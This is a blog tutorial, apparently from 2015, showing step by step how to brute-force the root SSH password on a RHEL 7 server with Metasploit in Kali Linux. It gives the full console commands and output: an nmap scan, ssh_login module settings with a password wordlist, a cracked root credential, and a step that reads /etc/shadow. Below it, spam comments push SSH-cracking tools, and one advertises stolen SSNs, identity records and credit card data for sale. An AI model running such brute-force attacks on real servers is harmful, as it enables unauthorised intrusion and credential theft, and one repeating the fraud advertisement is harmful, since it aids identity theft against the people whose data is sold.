Wednesday, 17 June 2015

Hack SSH Server in RHEL 7 Using Metasploit in Kali Linux


In this tutorial, we will hack the password for 'root' user on SSH Server running in RHEL 7 using Metasploit running in Kali Linux.

SSH Server Name: meru.mycompany.com
SSH Server IP Address: 192.168.122.1

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.


2) Start metasploit console.
root@kali:~# msfconsole
msf >


3) Check database status 
msf > db_status
[*] postgresql connected to msf3


4) Perform nmap scan through a database extension in Metasploit. This scan will automatically add all the details that are found to various sections of Metasploit.
msf > db_nmap -sS 192.168.122.1 -p 22
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-17 14:01 IST
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)
[*] Nmap: Host is up (0.0024s latency).
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 22/tcp open  ssh
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

5) Search for module.
msf > search ssh
auxiliary/scanner/ssh/ssh_login                                              normal     SSH Login Check Scanner

6) Select the module.
msf > use auxiliary/scanner/ssh/ssh_login

7) View options.
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

8) Set options.
msf auxiliary(ssh_login) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1

msf auxiliary(ssh_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root

9) Execute the module
msf auxiliary(ssh_login) > run

[*] 192.168.122.1:22 SSH - Starting bruteforce
[-] 192.168.122.1:22 SSH - Failed: 'root:123456'
[-] 192.168.122.1:22 SSH - Failed: 'root:12345'
[-] 192.168.122.1:22 SSH - Failed: 'root:123456789'
[-] 192.168.122.1:22 SSH - Failed: 'root:password'
[-] 192.168.122.1:22 SSH - Failed: 'root:iloveyou'
[+] 192.168.122.1:22 SSH - Success: 'root:adminpasswd' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux meru.mycompany.com 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(ssh_login) > id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)

msf auxiliary(ssh_login) > cat /etc/shadow



As seen above, we have got a root shell on the victim machine.



8 comments:

  1. how to hack ssh root

    http://bicombusiness.blogspot.com/2016/01/sshpro13-final.html

    ReplyDelete


  2. how to crack ssh|ssh cracker|lazy ssh cracker|easy method of ssh cracking

    http://shanghaiblackgoons.com/67-lazy-ssh-cracker.html

    http://lobatandawgs.com/64-lazy-ssh-cracker.html

    ReplyDelete
  3. Bilal Khan is a thief don't listen to the mother fucker

    ReplyDelete
  4. Hey Guys !

    USA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information.

    **DETAILS IN LEADS**
    First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term Business
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete